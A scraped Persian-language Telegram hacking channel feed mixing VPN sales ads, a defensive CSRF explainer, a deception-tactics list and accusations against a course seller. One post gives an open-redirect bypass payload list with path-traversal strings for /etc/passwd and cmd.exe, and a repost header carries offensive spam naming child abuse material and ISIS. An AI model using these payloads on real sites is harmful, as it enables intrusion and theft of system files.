3 267
订阅者
+824 小时
+37 天
-1530 天
帖子存档
3 268
Repost from Isis / children porn / isis / داعش / "[تروریست]" pedo child rape filth. Terrorist kiddie porn shit
چنل برسه به 2K سوپرایز داریم برای بچه هایی که وب کار میکنن😉👨💻
3 268
برای خرید کانفیگ های پرسرعت با قیمت های باور نکردنی به آیدی زیر مراجعه کنید 😍
@nika_magician
@prisvpn
3 268
Repost from 𝗥𝗜𝗣𝗣𝗘𝗥 | شایان
بچه ها امشب تا فرداشب میتونید با تخفیف یلدایی کانفیگ خریداری کنید 😍🍉
به علاوه تخفیف ،هدیه هم دریافت کنید از ما 😍
@prisvpn
@nika_magician
3 268
https://www.instagram.com/al_ph_a13?igsh=OG9vOXZxcnZjNzkz
دوستان ممنون میشم پیج اینستاگراممون رو دنبال کنید
کلی مطلب برنامه نویسی و هک و امنیت خواهیم داشت داخلش
دوره جدید براتون میزاریم اگر ۱۲۰ نفر برسه دنبال کننده ها
3 268
🎯 آسیبپذیری CSRF چیست؟ 🤔
تصور کن وارد سایت بانک یا هر سرویس مهم دیگهای شدی و لاگین موندی. حالا یه لینک مشکوک رو توی پیام، ایمیل، یا کامنت باز میکنی. 😱 با این کار، ممکنه بدون اینکه حتی متوجه بشی، پولت رو به یه حساب دیگه منتقل کنی، تنظیمات حسابت رو تغییر بدی یا کاری خطرناک انجام بدی! 😨
این دقیقاً همون چیزیه که بهش CSRF یا حمله جعل درخواست میانوبگاهی هم میگن.
CSRF چطور کار میکنه؟ 🕵️♂️
تو لاگین هستی: برای اینکه بتونی از خدمات سایت استفاده کنی، مثل بانک یا شبکه اجتماعی، لاگین کردی و مرورگرت اطلاعات احراز هویت (مثل کوکیها یا توکنها) رو ذخیره کرده.
هکر یه لینک یا فرم مخرب درست میکنه: یه کد مخرب داخل لینک یا حتی یک دکمه جعلی قرار میده که در ظاهر بیضرره.
تو فریب میخوری: روی لینک کلیک میکنی یا یه فرم به ظاهر عادی رو ارسال میکنی.
درخواست جعلی ارسال میشه: مرورگر تو، با اطلاعات لاگین معتبرت، اون درخواست رو به سرور میفرسته و سرور چون تو رو لاگین شده میشناسه، اون رو معتبر میدونه و اجرا میکنه.
چرا CSRF خطرناکه؟ 😱
- غیرقابلتشخیص برای کاربر: تو هیچ نشونهای نمیبینی که بفهمی یه درخواست جعلی ارسال شده.
- دستکاری اطلاعات حساس: هکر میتونه پول انتقال بده، رمز عبور عوض کنه، یا تنظیماتت رو تغییر بده.
- همهجا رخ میده: از سرویسهای بانکی گرفته تا شبکههای اجتماعی، همه میتونن قربانی بشن.
چطور میشه جلوی CSRF رو گرفت؟ 🚨
برای کاربران:1️⃣ وی لینکهای مشکوک کلیک نکنید: چه از طریق ایمیل، پیام، یا حتی شبکههای اجتماعی، قبل از کلیک چک کنید لینک معتبر باشه.
2️⃣ بعد از استفاده، لاگاوت کنید: بهخصوص در سرویسهای حساس مثل بانکداری آنلاین یا حسابهای مهم.
3️⃣ از مرورگرهای امن استفاده کنید: مرورگرهایی که بهروز هستند و از کوکیهای امن پشتیبانی میکنند.
برای توسعهدهندگان:1️⃣ توکن CSRF استفاده کنید: این توکن یک رشته تصادفی و منحصربهفرده که با هر درخواست کاربر ارسال میشه و فقط در صورتی که معتبر باشه، درخواست پذیرفته میشه.
2️⃣ متدهای امن HTTP رو استفاده کنید: درخواستهای حساس مثل تغییر اطلاعات یا ارسال داده باید فقط از طریق متدهای
POST یا PUT انجام بشن، نه GET.
3️⃣ اعتبارسنجی منبع درخواست: مطمئن بشید که درخواست از دامنهای که بهش اعتماد دارید ارسال شده.
4️⃣ استفاده از کوکیهای SameSite: تنظیمات کوکیها رو طوری پیکربندی کنید که فقط از سایت خودتون قابل ارسال باشن.
5⃣ استفاده از حالت ناشناس : یکی دیگه از راهکار های جلوگیری از CSRF استفاده از حالت ناشناس مرورگر هست ، زیرا هیچگونه داده ای مانند توکن ، کوکی یا ... استفاده نمیشود .
6⃣ بلاک کردن توکن یا کوکی از خود مرورگر .
نتیجهگیری:CSRF یکی از اون حملههای خطرناکه که اگر پیشگیری نکنیم، میتونه به اطلاعات و داراییهامون آسیب بزنه. با رعایت نکات بالا و افزایش آگاهی، میتونیم خودمون و سرویسهامون رو ایمن نگه داریم. 🌐💡
امنیت رو جدی بگیریم! 💪
#امنیت #هکینگ #CSRF #امنیت_وب #آگاهی3 268
dark Psychologyدر زیر هر یک از انواع فریب (deception) به همراه توضیحات و مثالهایی آورده شده است: ### 1. Mass Deception (فریب جمعی) توضیح: فریب جمعی به فرآیند تأثیرگذاری بر افکار و رفتار گروههای بزرگ از افراد اشاره دارد، معمولاً از طریق رسانهها یا اطلاعرسانی نادرست. مثال: یک کمپین تبلیغاتی میتواند اطلاعات نادرست درباره یک محصول را منتشر کند تا مردم را متقاعد کند که این محصول خاص فوقالعاده مؤثر و ضروری است. ### 2. Misdirection (سردرگمی) توضیح: این نوع فریب شامل منحرف کردن توجه افراد از واقعیت اصلی به چیزی دیگر است. این تکنیک در تردستیها و فریبهای روانشناختی به کار میرود. مثال: یک شعبدهباز میتواند توجه تماشاگران را به سرعت به یک دستش جلب کند در حالی که با دست دیگرش چیزی را پنهان میکند یا جابجا میکند. ### 3. Verbal Deception (فریب کلامی) توضیح: این نوع فریب شامل گفتن اطلاعات نادرست یا گمراهکننده است که ممکن است به نظر منطقی بیاید، اما واقعیت ندارد. مثال: شخصی میتواند به دوستش بگوید: "من دیروز تو رو توی رستوران دیدم" در حالی که واقعاً آن شخص را ندیده است. این جمله میتواند به منظور ایجاد یک وضعیت خاص یا تصمیمگیری باشد. ### 4. Non-Verbal Deception (فریب غیرکلامی) توضیح: این نوع فریب شامل استفاده از زبان بدن، حرکات و رفتارها برای انتقال اطلاعات نادرست است. مثال: شخصی ممکن است در حال دروغ گفتن به کسی باشد، اما به جای اینکه از حرکات نادرست دست یا چشم خود استفاده کند، خود را به طور مصنوعی آرام و مطمئن نشان دهد تا فریب را مؤثرتر کند. ### 5. Bluffing (فریبکاری) توضیح: این نوع فریب معمولاً در بازیهای استراتژیک یا رقابتها استفاده میشود. فرد نشان میدهد که در موقعیتی قویتر یا مطمئنتر از آنچه که واقعاً هست، قرار دارد. مثال: در یک بازی پوکر، یک بازیکن ممکن است با قرار دادن چند چیپ بزرگ در وسط میز، طوری رفتار کند که گویی یک دست بسیار قوی دارد، در حالی که در واقع کارتهای ضعیفی در دست دارد. ### 6. Concealment (پنهانسازی) توضیح: پنهانسازی به معنای نگهداشتن اطلاعات یا واقعیتها از دیگران است به طوری که آنها از حقیقت آگاه نشوند. مثال: شخصی ممکن است از شریک زندگیاش دربارهی یک تصمیم مالی مهم که اتخاذ کرده است، پنهانکاری کند تا واکنش منفی او را از بین ببرد. ### 7. Fabrication (ساخت و ساز) توضیح: در این نوع فریب، شخصی اطلاعاتی را به طور کامل از نو ایجاد میکند یا دروغی را اختراع میکند. مثال: یک فرد ممکن است داستانی ثابت کند که او یک قهرمان جنگ بوده است، در حالی که هرگز در خدمات نظامی نبوده است. این کار میتواند برای افزایش اعتبار اجتماعی یا جلب توجه باشد. ### 8. Unpredictability (غیرقابل پیشبینی بودن) توضیح: این نوع فریب شامل رفتار غیرقابل پیشبینی است که فرد را از اقداماتی که ممکن است به درستی توجه دیگران را جلب کند، منحرف میکند. مثال: یک استراتژیست ممکن است در یک مذاکره به طور ناگهانی تصمیم بگیرد موضع خود را تغییر دهد و از نظر طرف مقابل غیرقابل پیشبینی عمل کند تا حریف را دچار سردرگمی کند و به نفع خود نتیجه بگیرد.
3 268
امروز همه چنل ها واگذار میشه بنده از حضورتون مرخص میشم
کم سعادت بودیم تا بیشتر خدمت کنم بهتون
3 268
سلام بچه ها کسی میتونه سرور عمده بهم بده ؟
خریدارم ازش
اگر کسی هست پیام بده
@nika_magician
@nika_magician
3 268
Repost from 𝗥𝗜𝗣𝗣𝗘𝗥 | شایان
امشب با خرید vpn های ما سه گیگ حجم رایگان دریافت کنید 😍
برای خرید به آیدی زیر مراجعه کنید ☃️❄️
@nika_magician
@nika_magician
3 268
هرکس که نمی تونست داخل چنل edb جوین بشه
با موفقیت مشکل درست شد
فقط دیگه از چنلا لفت ندید تا این مشکل براتون پیش نیاد
3 268
☄️You can try this effective manual Open Redirect Bypass☄️ 1. Null-byte injection: - /google.com%00/ - //google.com%00 2. Base64 encoding variations: - aHR0cDovL2dvb2dsZS5jb20= - aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ== - //base64:d3d3Lmdvb2dsZS5jb20=/ 3. Case-sensitive variations: - //GOOGLE.com/ - //GoOgLe.com/ 4. Overlong UTF-8 sequences: - %C0%AE%C0%AE%2F (overlong encoding for ../) - %C0%AF%C0%AF%2F%2Fgoogle.com 5. Mixed encoding schemes: - /%68%74%74%70://google.com - //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D - //base64:%2F%2Fgoogle.com/ 6. Alternative domain notations: - //google.com@127.0.0.1/ - //127.0.0.1.xip.io/ - //0x7F000001/ (hexadecimal IP) 7. Trailing special characters: - //google.com/#/ - //google.com/;&/ - //google.com/?id=123&// 8. Octal IP address format: - http://0177.0.0.1/ - http://00177.0000.0000.0001/ 9. IP address variants: - http://3232235777 (decimal notation of an IP) - http://0xC0A80001 (hex notation of IP) - http://192.168.1.1/ 10. Path traversal with encoding: - /..%252f..%252f..%252fetc/passwd - /%252e%252e/%252e%252e/%252e%252e/etc/passwd - /..%5c..%5c..%5cwindows/system32/cmd.exe 11. Alternate protocol inclusion: - ftp://google.com/ - javascript:alert(1)//google.com 12. Protocol-relative URLs: - :////google.com/ - :///google.com/ 13. Redirection edge cases: - //google.com/?q=//bing.com/ - //google.com?q=https://another-site.com/ 14. IPv6 notation: - http://[::1]/ - http://[::ffff:192.168.1.1]/
15. Double URL encoding: - %252f%252fgoogle.com (encoded twice) - %255cgoogle.com 16. Combined traversal & encoding: - /%2E%2E/%2E%2E/etc/passwd - /%2e%2e%5c%2e%2e/etc/passwd 17. Reverse DNS-based: - https://google.com.reverselookup.com - //lookup-reversed.google.com/ 18. Non-standard ports: - http://google.com:81/ - https://google.com:444/ 19. Unicode obfuscation in paths: - /%E2%80%8Egoogle.com/ - /%C2%A0google.com/ 20. Query parameters obfuscation: - //google.com/?q=http://another-site.com/ - //google.com/?redirect=https://google.com/ 21. Using @ symbol for userinfo: - https://admin:password@google.com/ - http://@google.com 22. Combination of userinfo and traversal: - https://admin:password@google.com/../../etc/passwd
3 268
نمی دونم برادر چاخان میده یا واقعا گفتی
ولی واقعا اگه گفتی بهت تبریک میگم تو یه احمق به تمام معنایی که جز کلاهبرداری و کپی برداری چیزی بلد نیسی
اره بیان تو چنل وی ای پی تو یا دوره های تو یادبگیرن پنتست رو
چطوری این پولا از گلوت پایین میره
3 268
بیار اومد گفت دوره های mcsa, oscp, sans تخمیه نبینین دیگه ببین یارو چقدر کصخله اومده سرفصل های بینالمللی رو زیر سوال میبره 🤣🤣🤣🤣
3 268
یعنی واقعا بعد افشای پروفسور سنایی بازم دارید دوره هاشو میخرید؟
این پست هارو شیر کنید داخل گپ ها و کانالتون بقیه تو دام این کلاهبرداری نیوفتن
3 268
خب هنوز هم باور ندارید؟
بزارید یک مثال دیگه براتون بزنم
آقای بهروز منصوری
که دوره کلوپ امنیت 1
هک وبسایت رو از صفر تا صد رو به صورت حرفه ای آموزش میده
و در جلو تر متوجه شدیم که کوروش سنایی (کلاهبردار اینترنتی)
پکیج وب هکینگش کپی از دوره های بهروز منصوری بوده
و نه تنها بهروز منصوری، بلکه کوروش سنایی از جاهای دیگه هم کپی رفته
3 268
این هم ابزارییه که باهاش صفحه ورود به دوربین های مداربسته رو کرک میکنن😂😂
patator
یک ابزار کاملا رایگان روی کالی لینوکس هست و کلی آموزش خوب و درست حسابیه رایگان ازش توی اینترنت موجوده!
کل دوره های این بشر دقیقا همینطوره!
استفاده از ابزار های پابلیک و آموزش مطالب و تکنیک های پابلیک در سطح اینترنت!
